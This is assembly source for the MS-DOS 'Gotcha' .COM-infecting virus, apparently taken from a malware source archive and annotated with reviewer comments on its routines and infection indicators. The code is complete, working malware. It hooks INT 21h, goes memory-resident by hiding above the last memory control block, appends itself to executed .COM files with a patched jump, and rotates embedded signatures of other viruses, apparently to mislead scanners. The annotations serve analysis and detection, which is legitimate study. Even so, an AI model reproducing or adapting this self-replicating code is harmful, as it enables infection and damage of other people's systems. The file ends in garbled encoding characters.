MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.gotcha4.asm

;****************************************************************************
;* stripped COM version
;* with signatures
;*
;* Reviewer notes (analysis only; code below is unchanged):
;*  - Syntax is MASM/TASM (segment/assume/org/.RADIX), not NASM as the
;*    listing header claims.
;*  - .RADIX 16 at the end of this block makes every LATER numeric literal
;*    without a suffix hexadecimal: "int 20" is INT 20h, "mov di,0100" is
;*    0100h, "sub ax,0103" is 0103h.
;*  - Observable artifacts of an infection, all visible in this source:
;*    infected .COM files end with the 8-byte marker 'GOTCHA!',0 (label
;*    signature) and start with a near JMP (0E9h) patched in by attach; a
;*    resident INT 21h hook (ni21) answers AX=0DADAh with AH=0A5h,
;*    AL=VERSION; the host's first BUFLEN bytes are carried inside the
;*    appended body (field buffer) and put back by entry.
;****************************************************************************
cseg segment
assume cs:cseg,ds:cseg,es:nothing
org 100h
SIGNLEN equ signend - signature ; length of the trailing marker string (8)
FILELEN equ eind - begin        ; size of the body appended to every host
RESPAR equ (FILELEN/16) + 17    ; paragraphs taken from the top of memory (16 and 17 are decimal: .RADIX 16 comes later); presumably body/16 + 16 for the 100h offset the copy is placed at + 1 rounding
BUFLEN equ 08h                  ; bytes of the host's start that are saved and overwritten
VERSION equ 4                   ; returned in AL by the AX=0DADAh installation check
.RADIX 16                       ; from here on, unsuffixed literals are hex
;****************************************************************************
;* Startup program (the stand-alone dropper)
;* Calls crypt with CL = 7,6,...,1 so signature blocks 1..7 are bit-inverted
;* and only block 0 stays readable, makes the body resident via install and
;* terminates.  It infects nothing itself; infection happens later from the
;* INT 21h hook.  BX is zeroed because install adds BX to the offsets it
;* stores (from entry, BX is the load displacement inside a host).
;****************************************************************************
begin: xor bx,bx                ; load displacement = 0: assembled offsets are correct here
mov cl,07h                      ; only CL is written; CH is assumed to be 0 at .COM entry
crloop: call crypt              ; invert 20-byte signature block number CL
loop crloop                     ; CX counts 7 -> 1, so block 0 is never touched
call install                    ; go resident (hooks INT 21h)
int 20                          ; INT 20h (hex radix): terminate the dropper
;****************************************************************************
;* Data
;* These fields lie inside begin..eind, so every appended copy carries a
;* snapshot of them (writeprog writes the running copy to the file).
;****************************************************************************
buffer db BUFLEN dup (?)        ; host's original first BUFLEN bytes (filled by attach, restored by entry)
oi21 dw ?,?                     ; saved original INT 21h vector: offset, then segment
oldlen dw ?                     ; host file length, low word only (from the seek-to-end in attach)
handle dw ?                     ; DOS handle of the file currently being processed
sign db 0                       ; index (0..7) of the signature block that is currently NOT inverted
;****************************************************************************
;* Interrupt 21h handler (the resident hook)
;* Only AX=4B00h (DOS EXEC, DS:DX = ASCIIZ path of the program about to run)
;* is acted on: the file is passed to attach, then the readable signature
;* block is rotated (current one inverted, [sign] advanced mod 8, next one
;* un-inverted).  AX=0DADAh is the installation check, answered with
;* AX=0A500h+VERSION.  Every other call is chained to the saved vector.
;* Detection note: the hook is visible as an INT 21h vector pointing into
;* the region above the last MCB (see install) and by the 0DADAh/0A5h
;* handshake.
;****************************************************************************
ni21: pushf
cmp ax,4B00h                    ; EXEC (load and execute)?
jne ni_verder
push es
push ds
push ax
push bx
push cx
push dx
call attach                     ; DS:DX is still the caller's file name
mov cl,[sign]                   ; uses DS; attach only switches DS to CS after a successful open
call crypt                      ; invert the currently readable block again
inc cl
and cl,07h                      ; next block index, modulo 8
mov [sign],cl
call crypt                      ; make the next block readable
pop dx
pop cx
pop bx
pop ax
pop ds
pop es
exit: popf
jmp dword ptr cs:[oi21] ; chain to the original INT 21h handler
ni_verder: cmp ax,0DADAh        ; installation check?
jne exit
mov ax,0A500h+VERSION           ; reply: AH=0A5h, AL=version number
popf
iret
;****************************************************************************
;* Appends the program to a file (ASCIIZ name at DS:DX)
;* Steps: open read/write; seek to end to get the length; read the last
;* SIGNLEN bytes and stop if they already equal the marker; read the first
;* BUFLEN bytes into buffer and stop if they start with 'MZ' (EXE); append
;* the whole body begin..eind (buffer included, so the host's start travels
;* with it); overwrite the start with a near JMP to entry; close.
;* Every failure goes to finnish, which closes [handle].  No file date/time
;* or attribute is saved and restored (there are no AH=57h/43h calls), so
;* an infected file's timestamp changes on close - a forensic indicator.
;* Register use: AX/CX/DX/SI/DI scratch; DS and ES are set to CS after the
;* open succeeds.
;****************************************************************************
attach: cld
mov ax,3D02h ; open the file, read/write access
int 21
jc finnish                      ; open failed: DS is still the caller's segment when finnish runs
push cs
pop ds
mov [handle],ax ; save the file handle
call eindptr ; determine the length (seek to end, DX:AX = size)
jc finnish
mov [oldlen],ax                 ; low word only
sub ax,SIGNLEN ; position = end - SIGNLEN
sbb dx,0
mov cx,dx
mov dx,ax
mov al,00h                      ; seek relative to the start of the file
call ptrmov
jc finnish
mov cx,SIGNLEN ; read the last SIGNLEN bytes
mov dx,offset buffer
call flread
jc finnish
verder3: push cs ; compare the marker with buffer
pop es
mov di,offset buffer
mov si,offset signature
mov cx,SIGNLEN
rep cmpsb
or cx,cx                        ; CX=0 (all bytes compared) is treated as "already infected"
jz finnish
call beginptr ; read the start of the file
mov cx,BUFLEN
mov dx,offset buffer            ; buffer now holds the host's original first BUFLEN bytes
call flread
jc finnish
cmp word ptr [buffer],5A4Dh     ; 'MZ' header: EXE files are left alone
jz finnish
call writeprog ; append the body (buffer still intact) to the file
jc finnish
mov ax,[oldlen] ; compute the JMP displacement
add ax,offset entry             ; target = oldlen + offset entry (the body is loaded at 100h + oldlen)
sub ax,0103                     ; minus 0103h (hex radix), the address after the 3-byte JMP at 100h
mov byte ptr [buffer],0E9h      ; JMP rel16 opcode
mov word ptr [buffer+1],ax
call beginptr ; patch the start of the file
mov cx,BUFLEN
mov dx,offset buffer            ; bytes 3..7 of buffer are still the host's own bytes
call flwrite
jc finnish
finnish: mov bx,[handle] ; close the file
mov ah,3Eh
int 21
ret
;****************************************************************************
;* Invert one signature block
;* In:   CL = block index (0..7); each block in virsig is 14h = 20 bytes
;* Does: XORs the 10 words of that block with 0FFFFh in place.  The operation
;*       is its own inverse, so a second call restores the block.
;* Out:  DS = ES = CS.  Clobbers AX, SI, DI, flags; CX is preserved.
;* Uses the assembled offset of virsig (no BX displacement), which is valid
;* for the dropper and the resident copy; the entry path never calls it.
;****************************************************************************
crypt: push cx
mov al,14h                      ; block size in bytes
mul cl                          ; AX = 20 * index (AH clobbered)
add ax,offset virsig
mov si,ax
mov di,ax                       ; read and write the same location
push cs
push cs
pop ds
pop es
mov cx,0Ah                      ; 10 words = 20 bytes
cryploop: lodsw
xor ax,0FFFFh                   ; invert every bit
stosw
loop cryploop
pop cx
ret
;****************************************************************************
;* Write program to file: seek to end, then append FILELEN bytes from begin.
;* The bytes come from the running copy, so the appended body carries the
;* current buffer (host start), sign and signature-block state.
;* Out: CF from the write; the seek's CF is not examined here.
;****************************************************************************
writeprog: call eindptr
mov cx,FILELEN
mov dx,offset begin             ; DS is forced to CS inside flwrite
call flwrite
ret
;****************************************************************************
;* File-pointer subroutines (DOS AH=42h LSEEK on [handle])
;* beginptr: seek to the start (AL=0, CX:DX=0)
;* eindptr:  seek to the end   (AL=2, CX:DX=0), falls through into ptrmov
;* ptrmov:   raw seek; caller supplies AL = origin and CX:DX = offset
;* Out: DX:AX = new position, CF set on error.  [handle] is read via DS,
;*      so DS must already be CS.
;****************************************************************************
beginptr: mov al,00h ; to the start of the file
xor cx,cx
xor dx,dx
jmp ptrmov
eindptr: mov al,02h ; to the end of the file
xor cx,cx
xor dx,dx
; jmp ptrmov (falls through)
ptrmov: mov ah,42h              ; LSEEK
mov bx,[handle]
int 21
ret
;****************************************************************************
;* Read/write subroutines on [handle]
;* flwrite: DOS AH=40h write.  In: CX = byte count, DX = buffer offset.
;*          DS is forced to CS, so the buffer is always inside this body.
;*          Out: AX = bytes written, CF set on error.
;****************************************************************************
flwrite: push cs
pop ds
mov ah,40h                      ; DOS write
mov bx,[handle]
int 21
ret
; flread: DOS AH=3Fh read.  In: CX = byte count, DX = buffer offset; DS is
;         forced to CS.  Out: AX = bytes read, CF set on error.
flread: push cs
pop ds
mov ah,3Fh                      ; DOS read
mov bx,[handle]
int 21
ret
;****************************************************************************
;* Activation from an infected file
;* The JMP patched into the host's first bytes lands here, with the body at
;* 100h+oldlen instead of its assembled org.  The call/pop pair yields
;* BX = actual address of entry2 - assembled offset of entry2, i.e. the load
;* displacement that install adds to the offsets it touches.  The host's
;* original first BUFLEN bytes are copied back to 100h, the installation
;* check is made, and the host is then started by "returning" to 100h.
;* Assumes DS = ES = CS, the .COM load convention, for the rep movsb.
;****************************************************************************
entry: call entry2
entry2: pop bx
sub bx,offset entry2 ; CS:BX = start of the body - 100h (the load displacement)
cld
mov ax,bx ; copy the saved start of the host back
add ax,offset buffer            ; buffer inside THIS appended copy of the body
mov si,ax
mov di,0100                     ; 0100h (hex radix): the host's first bytes
mov cx,BUFLEN
rep movsb
mov ax,0100h
push ax                         ; return address for the final ret: the restored host
entcall: mov ax,0DADAh ; already installed?
int 21h
cmp ah,0A5h
je entstop                      ; a resident copy answered: do not install twice
call install ; install the program (BX = load displacement)
entstop: ret                    ; "return" to 100h = run the host
;****************************************************************************
;* Installation in memory (goes resident without the DOS TSR services)
;* In:   BX = load displacement (0 from begin; computed in entry)
;* Does: saves the INT 21h vector, read straight from the IVT at 0:0084h
;*       rather than via AH=35h; shrinks this program's own memory block by
;*       RESPAR paragraphs - the MCB at DS-1 must be the last block ('Z') -
;*       and lowers PSP:0002h (top-of-memory pointer; reached as ES:0012h
;*       because ES = PSP-1) by the same amount; copies the body to offset
;*       100h of the segment just above the shrunk block so the assembled
;*       offsets stay valid there; points INT 21h at ni21 in that segment.
;* Out:  DS/ES preserved; AX, CX, DX, SI, DI clobbered.  If the block is not
;*       the last one or is too small, nothing is changed (cancel).
;* Detection note: the resident copy lives above the last MCB, so it is not
;*       listed in the MCB chain; the visible effects are a lowered
;*       top-of-memory value and an INT 21h vector pointing into that gap.
;****************************************************************************
install: push ds
push es
xor ax,ax ; fetch the old vector
mov es,ax                       ; ES = 0000h, the interrupt vector table
mov cx,word ptr es:0084h        ; INT 21h offset (21h * 4 = 84h)
mov dx,word ptr es:0086h        ; INT 21h segment
mov [bx+offset oi21],cx         ; stored through BX, the load displacement
mov [bx+offset oi21+2],dx
mov ax,ds ; adjust the memory size
dec ax
mov es,ax                       ; ES = MCB of this program (PSP segment - 1)
cmp byte ptr es:[0000h],5Ah     ; 'Z': last block in the chain?
jnz cancel
mov ax,es:[0003h]               ; block size in paragraphs
sub ax,RESPAR
jb cancel                       ; not enough memory
mov es:[0003h],ax               ; shrink the block
sub es:[0012h], word ptr RESPAR ; same as PSP:0002h (top-of-memory segment)
mov es,es:[0012h] ; copy the program to the top (the region just released)
mov ax,bx
add ax,0100                     ; BX + 0100h (hex radix) = actual address of begin
mov si,ax
mov di,0100h                    ; same offset in the new segment: offsets need no relocation
mov cx,FILELEN
rep movsb
mov dx,offset ni21 ; set the new vector
push es
pop ds                          ; DS:DX = new handler
mov ax,2521h                    ; AH=25h set interrupt vector, AL=21h
int 21h
cancel: pop es
pop ds
ret
;****************************************************************************
;* Text and signature
;* virsig: eight 20-byte blocks (14h bytes each, the size crypt assumes),
;* each labelled by the author as a byte pattern of another DOS virus.  After
;* begin runs, blocks 1..7 are bit-inverted and only block 0 is readable;
;* ni21 rotates which single block is readable after every infection.  The
;* apparent intent (not verifiable from this file alone) is that signature
;* scanners of the time report an infected file as one of these other
;* viruses.  Files that trigger inconsistent detections and end with the
;* 'GOTCHA!',0 marker should be examined with this family in mind.
;* The bytes below are data, reproduced unchanged.
;****************************************************************************
virsig:
;SYSLOCK Virus (block 0, readable after begin)
db 0D1h, 0E9h, 8Ah, 0E1h
db 8Ah, 0C1h, 33h, 06h
db 14h, 00h, 31h, 04h
db 46h, 46h, 0E2h, 0F2h
db 5Eh, 59h, 58h, 0C3h
;Sylvia Virus (block 1)
db 8Dh, 36h, 03h, 01h
db 33h, 0C9h, 33h, 0C0h
db 0ACh, 3Ch, 1Ah, 74h
db 04h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;DATACRIME IIb Virus (block 2)
db 2Eh, 8Ah, 07h, 32h
db 0C2h, 0D0h, 0CAh, 2Eh
db 88h, 07h, 43h, 0E2h
db 0F3h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;Yankee-Go-Home Virus (Enigma) (block 3)
db 0D8h, 0Eh, 1Fh, 0BEh
db 37h, 08h, 81h, 0EEh
db 03h, 01h, 03h, 0F3h
db 89h, 04h, 0BEh, 39h
db 08h, 81h, 0EEh, 03h
;Slowdown Virus (block 4)
db 0DEh, 90h, 90h, 81h
db 0C6h, 1Bh, 00h, 0B9h
db 90h, 06h, 2Eh, 80h
db 34h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;Scotts Valley Virus (block 5)
db 5Eh, 8Bh, 0DEh, 90h
db 90h, 81h, 0C6h, 32h
db 00h, 0B9h, 12h, 08h
db 2Eh, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;Tiny-2A related Virus (block 6)
db 0A5h, 8Eh, 0C1h, 0A6h
db 74h, 12h, 4Eh, 4Fh
db 0F3h, 0A5h, 8Eh, 0C1h
db 93h, 91h, 91h, 26h
db 87h, 85h, 0E0h, 0FEh
;DATACRIME 1280 Virus (block 7)
db 8Bh, 36h, 01h, 01h
db 83h, 0EEh, 03h, 8Bh
db 0C6h, 3Dh, 00h, 00h
db 75h, 03h, 0E9h, 02h
db 01h, 90h, 90h, 90h
; The three blocks below are disabled alternatives (commented out in the
; original); they are not assembled and crypt never reaches them.
;;July13 Virus
; db 0A0h, 12h, 00h, 34h
; db 90h, 0BEh, 12h, 00h
; db 0B9h, 0B1h, 04h, 2Eh
; db 30h, 04h, 46h, 0E2h
; db 0FAh, 90h, 90h, 90h
;;XA1 Virus (Tannenbaum)
;virsig: db 0FAh, 8Bh, 0ECh, 58h
; db 32h, 0C0h, 89h, 46h
; db 02h, 81h, 46h, 00h
; db 28h, 00h, 90h, 90h
; db 90h, 90h, 90h, 90h
;;Twelve Tricks Trojan Dropper
; db 0BEh, 64h, 02h, 31h
; db 94h, 42h, 01h, 0D1h
; db 0C2h, 4Eh, 79h, 0F7h
; db 90h, 90h, 90h, 90h
; db 90h, 90h, 90h, 90h
; Infection marker: the last SIGNLEN (8) bytes of every infected file.
; attach compares a file's tail against it to avoid re-infection.
signature: db 'GOTCHA!',0
signend:
eind:                           ; end of the body that is appended to hosts (FILELEN = eind - begin)
cseg ends
end begin                       ; entry point of the stand-alone dropper

; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>